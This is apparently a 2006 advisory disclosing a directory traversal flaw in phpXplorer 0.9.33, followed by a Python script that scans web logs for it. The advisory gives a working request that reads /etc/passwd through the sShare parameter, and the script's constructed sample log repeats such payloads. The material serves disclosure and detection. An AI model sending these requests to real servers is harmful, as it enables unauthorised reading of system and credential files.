From: Oriol Torrent Santiago <oriol.torrent_(at)_gmail.com>
Date: 17.01.2006
Subject: Directory traversal in phpXplorer

==========================================================
Title: Directory traversal in phpXplorer

Application: phpXplorer
Vendor: http://www.phpxplorer.org
Vulnerable Versions: 0.9.33
Bug: directory traversal
Date: 16-January-2006
Author: Oriol Torrent Santiago < oriol.torrent.AT.gmail.com >

References:
http://www.arrelnet.com/advisories/adv20060116.html

==========================================================

1) Background
  -----------
 phpXplorer is an open source file management system written in PHP.
 It enables you to work on a remote file system through a web browser.


2) Problem description
  --------------------
  An attacker can read arbitrary files outside the web root by sending
  specially formed requests.

 Ex:
 
 http://host/phpXplorer/system/workspaces.php?sShare=../../../../../../../../etc/passwd%00&ref=1


3) Solution:
  ----------
  No Patch available.


4) Timeline
  ---------
  17/12/2005 Bug discovered
  20/12/2005 Vendor receives detailed advisory. No response
  04/01/2006 Second notification. No response
  16/01/2006 Public Disclosure
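
With no patch available, web server logs are one place to look for the request pattern described in section 2. The following is an added example, not part of the original advisory or of phpXplorer: it flags requests to system/workspaces.php whose sShare parameter decodes to a NUL byte, a ".." path segment, or an absolute path. The log lines are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_sshare(target):
    """Return the reasons the sShare parameter of a request target looks hostile."""
    parts = urlsplit(target)
    if not parts.path.endswith("/system/workspaces.php"):
        return []
    reasons = []
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        if name != "sShare":
            continue
        # parse_qsl decoded once already; decode further, unify separators
        value = fully_decode(raw).replace("\\", "/")
        if "\x00" in value:
            reasons.append("nul-byte")
        if ".." in value.split("/"):
            reasons.append("dot-dot-segment")
        if value.startswith("/"):
            reasons.append("absolute-path")
    return reasons

SAMPLE_LOG = [  # constructed lines, not taken from a real server
    '192.0.2.10 - - [17/Jan/2006:10:00:00 +0000] "GET /phpXplorer/system/workspaces.php?sShare=docs&ref=1 HTTP/1.1" 200 512',
    '192.0.2.66 - - [17/Jan/2006:10:00:05 +0000] "GET /phpXplorer/system/workspaces.php?sShare=../../../../etc/passwd%00&ref=1 HTTP/1.1" 200 1480',
    '192.0.2.66 - - [17/Jan/2006:10:00:09 +0000] "GET /phpXplorer/system/workspaces.php?sShare=%252e%252e%252fconf&ref=1 HTTP/1.1" 200 90',
]

def scan(lines):
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        reasons = suspicious_sshare(match.group(1)) if match else []
        if reasons:
            hits.append((number, reasons))
    return hits

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A hit paired with a 200 status and an unusually large response size deserves a closer look than one answered with an error.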
